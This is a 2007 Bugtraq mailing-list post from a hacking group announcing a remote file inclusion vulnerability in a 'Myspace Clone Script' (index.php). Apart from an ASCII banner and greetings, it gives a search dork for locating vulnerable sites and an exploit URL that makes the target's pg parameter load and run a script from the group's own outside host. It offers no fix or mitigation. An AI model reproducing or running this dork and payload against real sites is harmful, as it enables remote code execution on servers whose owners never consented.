
Date: 17 Nov 2007 15:57:01 -0000
From: verys-secret@...mail.com
To: bugtraq@...urityfocus.com
Subject: Myspace Clone Script (index.php) Remote File Inclusion Vulnerability

######################|S n I p E r - S A . C o m|###################
#                                                                  #
#  SSSSS      NNN        NN   II  PPPPPPP  EEEEEEEEE   RRRRR       #
# SS          NN NN      NN   II  PP    P  EE          RR   RR     #
#S            NN  NN     NN   II  PP    P  EE          RR     R    #
# SS          NN   NN    NN   II  PPPPPPP  EE          RR   RR     #
#   SSSS      NN    NN   NN   II PPP     EEEEEEE      RRRR         #
#        SS   NN     NN  NN   II  PP       EE          RRRR        #
#          S  NN      NN NN   II  PP       EE          RR  RR      #
#        SS   NN        NNN   II  PP       EE          RR   RR     #
#   SSSSS     NN        NNN   II  PP       EEEEEEEEEE  RR     RR   #
#                                                                  #
#####################|V e r Y - S e c R e T|########################
#found by :  VerY-SecReT <---->[SnipEr's TeaM]                     #
####################################################################
#HomePage : WwW.SnIpEr-Sa.Com                                      #
####################################################################
#DORK (altavista.com): "Search | Invite | Mail | Blog | Forum"     #
#########################################################################################################################
#EX: http://victim/index.php?pg=http://www.sniper-sa.com/sn2.txt?  #
#########################################################################################################################
#S.GreetZ: sniper-sa.com & SnIpEr-Sa & Rafoo                       #
####################################################################
#ThanX To: ShoOt3r , 911 , 3badi , Devil-X , Mr.Max , Golden Hacker#
####################################################################
#Contact : SecReT@...uRitY.Com.Sa  & http://www.sniper-sa.com      #
####################################################################
